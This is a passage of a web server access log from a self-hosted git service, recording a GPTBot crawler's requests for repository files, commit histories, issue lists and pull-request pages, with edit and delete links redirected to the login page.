"https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:44:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9842] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:44:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9831] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:44:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:44:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9839] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:44:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:44:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9842] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:44:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:44:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 